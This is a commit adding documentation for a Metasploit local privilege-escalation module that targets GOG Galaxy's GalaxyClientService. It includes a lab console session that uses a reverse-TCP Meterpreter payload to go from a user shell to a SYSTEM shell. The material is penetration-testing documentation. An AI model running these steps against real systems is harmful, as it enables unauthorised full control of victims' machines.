Land #13444, add GOG Galaxy Client Privesc
This commit is contained in:
Shelby Pace
@@ -0,0 +1,81 @@
|
||||
## Vulnerable Application
|
||||
|
||||
GOG Galaxy is a video game management client. One of its Windows services, *GalaxyClientService*, runs with *SYSTEM* privileges.
|
||||
In versions 2.0.12 and earlier, and 1.2.64 and earlier, it is possible to communicate with the service and instruct it to
|
||||
execute arbitrary commands as *SYSTEM*.
|
||||
|
||||
A vulnerable [version](https://www.gog.com/galaxy) need only be installed on the target machine in order to be exploitable.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start *msfconsole*.
|
||||
2. Acquire a Meterpreter session.
|
||||
3. Do: ```use exploit/windows/local/gog_galaxyclientservice_privesc```
|
||||
4. Do: ```set SESSION <session_no>```
|
||||
5. Do: ```exploit```
|
||||
6. Verify that you get a Meterpreter session.
|
||||
|
||||
## Options
|
||||
### WORKING_DIR
|
||||
|
||||
The initial working directory of the command.
|
||||
|
||||
## Scenarios
|
||||
### GOG Galaxy Client `v1.2.66.64` on Windows 10
|
||||
|
||||
```
|
||||
msf5 > use multi/handler
|
||||
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
|
||||
payload => windows/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Sending stage (201283 bytes) to 192.168.37.131
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: DESKTOP-AQT4EG1\space
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-AQT4EG1
|
||||
OS : Windows 10 (10.0 Build 18362).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 15
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc
|
||||
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
|
||||
payload => windows/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
|
||||
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
|
||||
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Starting GalaxyClientService...
|
||||
[*] Service started successfully.
|
||||
[*] Connecting to service...
|
||||
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
|
||||
[*] Connected to service. Sending payload...
|
||||
[*] Sending stage (201283 bytes) to 192.168.37.131
|
||||
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
|
||||
[+] Command executed successfully!
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-AQT4EG1
|
||||
OS : Windows 10 (10.0 Build 18362).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 15
|
||||
Meterpreter : x64/windows
|
||||
```
|
||||
Reference in New Issue
Block a user